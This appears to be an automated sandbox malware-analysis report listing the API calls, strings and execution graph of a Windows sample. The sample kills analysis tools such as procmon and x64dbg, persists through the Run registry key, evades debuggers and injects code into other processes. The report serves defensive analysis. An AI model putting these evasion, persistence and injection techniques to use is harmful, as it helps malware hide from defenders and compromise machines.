                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0
                                                                                                                                                                                                                        • Opcode ID: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction ID: 1128876b946992ea1b84dfbd3045d8b15b392610cb310ee418bb019857f2b900
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF81DC36609B8186EB50DF55F85436AA7A1FBC9B92F104235DACD83B68DF7CE4448B04
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB4404: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB30A7), ref: 00007FF6C5DB444C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB4404: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB30A7), ref: 00007FF6C5DB4489
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB4404: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB30A7), ref: 00007FF6C5DB4494
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3B44: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB30AC), ref: 00007FF6C5DB3B87
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3B44: RegSetValueExW.ADVAPI32 ref: 00007FF6C5DB3BBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3B44: RegCloseKey.ADVAPI32 ref: 00007FF6C5DB3BCC
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3BE4: RegDeleteKeyW.ADVAPI32 ref: 00007FF6C5DB3BFC
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6C5DB3DF7
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: Process32FirstW.KERNEL32 ref: 00007FF6C5DB3E2A
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: CloseHandle.KERNEL32 ref: 00007FF6C5DB3E3C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: wcscmp.MSVCRT ref: 00007FF6C5DB3E51
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: OpenProcess.KERNEL32 ref: 00007FF6C5DB3E67
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: TerminateProcess.KERNEL32 ref: 00007FF6C5DB3E8A
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: CloseHandle.KERNEL32 ref: 00007FF6C5DB3E98
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: Process32NextW.KERNEL32 ref: 00007FF6C5DB3EAB
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: CloseHandle.KERNEL32 ref: 00007FF6C5DB3EBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3974: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6C5DB3ACC), ref: 00007FF6C5DB39A4
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF6C5DB3156
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 17e4246b454d86a9ec9ff2dcbc477a0c577d5e65a717ed21ef58b5ae3961d49a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1012C6191C706C6E630AF50F84872973A1FB84B4AF804234D6CD82698DF3CE949CB09
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction ID: 8ad30ac9b85da941eb618f93c9d0310b31e30ebe781b67fc531648643cd97fb6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3211DA71A0C78681E770AF11E88836A73A2FB84B96F004335D6DD82698DF3DE984DB04
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction ID: daf68198b3d460fdcfcc9718d765c61eb4a9d28b3353eb8f6652543e9f9e4365
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67116372528B8086D7909F14F84062A77A1FB84BA1F105330F9AE83BE8DF7CD485CB04
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 9bae4d9fde82d851bb8d1c3628467abac75d9b889708415cdb6d72ba0a21cad2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84E0ED2192CB86C2D660EF50FC5432973A1FB84B46F900234D5CD82664EF3CF989CB08
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3955
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB4524: CreateFileW.KERNEL32 ref: 00007FF6C5DB456B
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB10D8: OpenProcess.KERNEL32 ref: 00007FF6C5DB10FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF6C5DB2FC7
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF6C5DB2FDA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction ID: 5feb1054863da170313279e33938165495f4fbac0eebc413f16868219dcdb017
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8911C531A18B8685E750FF50EC443AA73A2FB84B46F400235D5CCC2665DF7CF8898B49

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:23.9%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:479
                                                                                                                                                                                                                        Total number of Limit Nodes:5
7ff6ec841df7 1255 7ff6ec8414ec LoadLibraryA GetProcAddress 1060->1255 1062 7ff6ec841e11 1256 7ff6ec8414ec LoadLibraryA GetProcAddress 1062->1256 1064 7ff6ec841e2b 1257 7ff6ec8414ec LoadLibraryA GetProcAddress 1064->1257 1066 7ff6ec841e45 1258 7ff6ec8414ec LoadLibraryA GetProcAddress 1066->1258 1068 7ff6ec841e5f 1259 7ff6ec8414ec LoadLibraryA GetProcAddress 1068->1259 1070 7ff6ec841e79 1260 7ff6ec8414ec LoadLibraryA GetProcAddress 1070->1260 1072 7ff6ec841e93 1261 7ff6ec8414ec LoadLibraryA GetProcAddress 1072->1261 1074 7ff6ec841ead 1262 7ff6ec8414ec LoadLibraryA GetProcAddress 1074->1262 1076 7ff6ec841ec7 1263 7ff6ec8414ec LoadLibraryA GetProcAddress 1076->1263 1078 7ff6ec841ee1 1264 7ff6ec8414ec LoadLibraryA GetProcAddress 1078->1264 1080 7ff6ec841efb 1265 7ff6ec8414ec LoadLibraryA GetProcAddress 1080->1265 1082 7ff6ec841f15 1266 7ff6ec8414ec LoadLibraryA GetProcAddress 1082->1266 1084 7ff6ec841f2f 1267 7ff6ec8414ec LoadLibraryA GetProcAddress 1084->1267 1086 7ff6ec841f49 1268 7ff6ec8414ec LoadLibraryA GetProcAddress 1086->1268 1088 7ff6ec841f63 1269 7ff6ec8414ec LoadLibraryA GetProcAddress 1088->1269 1090 7ff6ec841f7d 1270 7ff6ec8414ec LoadLibraryA GetProcAddress 1090->1270 1092 7ff6ec841f97 1271 7ff6ec8414ec LoadLibraryA GetProcAddress 1092->1271 1094 7ff6ec841fb1 1272 7ff6ec84149c LoadLibraryA GetProcAddress 1094->1272 1096 7ff6ec841fcb 1273 7ff6ec8414ec LoadLibraryA GetProcAddress 1096->1273 1098 7ff6ec841fe5 1274 7ff6ec8414ec LoadLibraryA GetProcAddress 1098->1274 1100 7ff6ec841fff 1275 7ff6ec8414ec LoadLibraryA GetProcAddress 1100->1275 1102 7ff6ec842019 1276 7ff6ec8414ec LoadLibraryA GetProcAddress 1102->1276 1104 7ff6ec842033 1277 7ff6ec8414ec LoadLibraryA GetProcAddress 1104->1277 1106 7ff6ec84204d 1278 7ff6ec8414ec LoadLibraryA GetProcAddress 1106->1278 1108 7ff6ec842067 1279 7ff6ec8414ec LoadLibraryA GetProcAddress 1108->1279 1110 7ff6ec842081 1280 7ff6ec84149c LoadLibraryA GetProcAddress 1110->1280 1112 7ff6ec84209b 1281 7ff6ec84149c LoadLibraryA 
GetProcAddress 1112->1281 1114 7ff6ec8420b5 1282 7ff6ec8414ec LoadLibraryA GetProcAddress 1114->1282 1116 7ff6ec8420cf 1283 7ff6ec8414ec LoadLibraryA GetProcAddress 1116->1283 1118 7ff6ec8420e9 1284 7ff6ec8414ec LoadLibraryA GetProcAddress 1118->1284 1120 7ff6ec842103 1285 7ff6ec8414ec LoadLibraryA GetProcAddress 1120->1285 1122 7ff6ec84211d 1286 7ff6ec8414ec LoadLibraryA GetProcAddress 1122->1286 1124 7ff6ec842137 1287 7ff6ec8414ec LoadLibraryA GetProcAddress 1124->1287 1126 7ff6ec842151 1127 7ff6ec8431ac IsDebuggerPresent 1126->1127 1128 7ff6ec8431be GetCurrentProcess CheckRemoteDebuggerPresent 1127->1128 1129 7ff6ec8431ba 1127->1129 1128->1129 1129->841 1129->842 1131 7ff6ec8440ca GetTokenInformation 1130->1131 1132 7ff6ec843431 1130->1132 1288 7ff6ec843b14 VirtualAlloc 1131->1288 1141 7ff6ec843ca4 GetModuleFileNameW 1132->1141 1134 7ff6ec8440fb GetTokenInformation 1135 7ff6ec844128 CloseHandle 1134->1135 1136 7ff6ec844142 AdjustTokenPrivileges CloseHandle 1134->1136 1137 7ff6ec843ae4 VirtualFree 1135->1137 1289 7ff6ec843ae4 1136->1289 1138 7ff6ec84413d 1137->1138 1138->1132 1142 7ff6ec843ccf PathFindFileNameW wcslen 1141->1142 1143 7ff6ec843d92 wcsncpy 1141->1143 1144 7ff6ec843d09 1142->1144 1143->1144 1144->846 1146 7ff6ec84351d 1145->1146 1147 7ff6ec844210 GetLastError 1145->1147 1146->877 1146->878 1147->1146 1148 7ff6ec84421d CloseHandle 1147->1148 1148->1146 1292 7ff6ec843884 1149->1292 1151 7ff6ec8432ad 1295 7ff6ec844524 CreateFileW 1151->1295 1153 7ff6ec843307 CreateThread 1153->870 1154 7ff6ec8432c5 1154->1153 1307 7ff6ec844084 1154->1307 1159 7ff6ec843884 11 API calls 1158->1159 1160 7ff6ec84321c 1159->1160 1342 7ff6ec8442f4 CreateFileW 1160->1342 1164 7ff6ec843704 3 API calls 1163->1164 1165 7ff6ec843a5f 1164->1165 1166 7ff6ec843884 11 API calls 1165->1166 1167 7ff6ec843a69 GetModuleFileNameW DeleteFileW CopyFileW 1166->1167 1168 7ff6ec843557 1167->1168 1169 7ff6ec843aab SetFileAttributesW 1167->1169 1171 7ff6ec84339c GetVersionExW 1168->1171 1354 
7ff6ec843974 RegOpenKeyExW 1169->1354 1172 7ff6ec8433cd 1171->1172 1172->882 1172->883 1173->898 1174->900 1175->902 1176->904 1177->906 1178->908 1179->910 1180->912 1181->914 1182->916 1183->918 1184->920 1185->922 1186->924 1187->926 1188->928 1189->930 1190->932 1191->934 1192->936 1193->938 1194->940 1195->942 1196->944 1197->946 1198->948 1199->950 1200->952 1201->954 1202->956 1203->958 1204->960 1205->962 1206->964 1207->966 1208->968 1209->970 1210->972 1211->974 1212->976 1213->978 1214->980 1215->982 1216->984 1217->986 1218->988 1219->990 1220->992 1221->994 1222->996 1223->998 1224->1000 1225->1002 1226->1004 1227->1006 1228->1008 1229->1010 1230->1012 1231->1014 1232->1016 1233->1018 1234->1020 1235->1022 1236->1024 1237->1026 1238->1028 1239->1030 1240->1032 1241->1034 1242->1036 1243->1038 1244->1040 1245->1042 1246->1044 1247->1046 1248->1048 1249->1050 1250->1052 1251->1054 1252->1056 1253->1058 1254->1060 1255->1062 1256->1064 1257->1066 1258->1068 1259->1070 1260->1072 1261->1074 1262->1076 1263->1078 1264->1080 1265->1082 1266->1084 1267->1086 1268->1088 1269->1090 1270->1092 1271->1094 1272->1096 1273->1098 1274->1100 1275->1102 1276->1104 1277->1106 1278->1108 1279->1110 1280->1112 1281->1114 1282->1116 1283->1118 1284->1120 1285->1122 1286->1124 1287->1126 1288->1134 1290 7ff6ec843b08 1289->1290 1291 7ff6ec843af5 VirtualFree 1289->1291 1290->1132 1291->1290 1326 7ff6ec843704 GetWindowsDirectoryW 1292->1326 1294 7ff6ec8438b3 8 API calls 1294->1151 1296 7ff6ec84457e 1295->1296 1297 7ff6ec844585 GetFileSize GetProcessHeap RtlAllocateHeap 1295->1297 1296->1154 1298 7ff6ec8445e0 ReadFile 1297->1298 1299 7ff6ec8445ce CloseHandle 1297->1299 1300 7ff6ec844607 GetProcessHeap HeapFree CloseHandle 1298->1300 1301 7ff6ec84462f 1298->1301 1299->1296 1300->1296 1302 7ff6ec844648 GetProcessHeap HeapFree CloseHandle 1301->1302 1304 7ff6ec844670 1301->1304 1302->1296 1303 7ff6ec8447db GetProcessHeap HeapFree CloseHandle 1303->1296 1304->1303 1305 
7ff6ec84472b GetProcessHeap RtlAllocateHeap 1304->1305 1306 7ff6ec844774 1305->1306 1306->1303 1331 7ff6ec843fc4 CreateToolhelp32Snapshot 1307->1331 1310 7ff6ec8410d8 OpenProcess 1311 7ff6ec84111f 1310->1311 1312 7ff6ec841115 1310->1312 1338 7ff6ec8413c4 GetModuleHandleA GetProcAddress 1311->1338 1312->1153 1314 7ff6ec84112c 1314->1312 1315 7ff6ec8411fe VirtualAllocEx 1314->1315 1315->1312 1316 7ff6ec84124f WriteProcessMemory 1315->1316 1316->1312 1317 7ff6ec841286 WriteProcessMemory 1316->1317 1317->1312 1318 7ff6ec8412d1 1317->1318 1340 7ff6ec841444 GetSystemInfo 1318->1340 1321 7ff6ec8412fe GetModuleHandleA GetProcAddress 1321->1312 1323 7ff6ec841338 1321->1323 1322 7ff6ec841444 GetSystemInfo 1324 7ff6ec8412f4 1322->1324 1323->1312 1325 7ff6ec841399 CloseHandle 1323->1325 1324->1321 1324->1325 1325->1312 1327 7ff6ec843758 GetVolumeInformationW 1326->1327 1328 7ff6ec84374e 1326->1328 1330 7ff6ec8437d4 1327->1330 1328->1327 1329 7ff6ec84383e wsprintfW 1329->1294 1330->1329 1332 7ff6ec843fff Process32FirstW 1331->1332 1333 7ff6ec8432f2 1331->1333 1334 7ff6ec844059 CloseHandle 1332->1334 1335 7ff6ec84401e wcscmp 1332->1335 1333->1310 1334->1333 1336 7ff6ec844035 1335->1336 1337 7ff6ec844042 Process32NextW 1335->1337 1336->1334 1337->1334 1337->1335 1339 7ff6ec8413ff 1338->1339 1339->1314 1341 7ff6ec8412ea 1340->1341 1341->1321 1341->1322 1343 7ff6ec84436b GetLastError 1342->1343 1344 7ff6ec84434a 1342->1344 1346 7ff6ec84322f CreateThread Sleep CreateThread 1343->1346 1348 7ff6ec844244 GetFileSize 1344->1348 1346->868 1353 7ff6ec843b14 VirtualAlloc 1348->1353 1350 7ff6ec844270 1351 7ff6ec8442ba CloseHandle 1350->1351 1352 7ff6ec844284 SetFilePointer ReadFile 1350->1352 1351->1346 1352->1351 1353->1350 1355 7ff6ec8439b9 RegSetValueExW RegCloseKey 1354->1355 1356 7ff6ec8439b5 1354->1356 1355->1356 1356->1168 1357 7ff6ec84333c 1360 7ff6ec8424cc GetModuleFileNameW 1357->1360 1361 7ff6ec84254d 1360->1361 1367 7ff6ec842548 1360->1367 1362 7ff6ec84258b 1361->1362 1363 
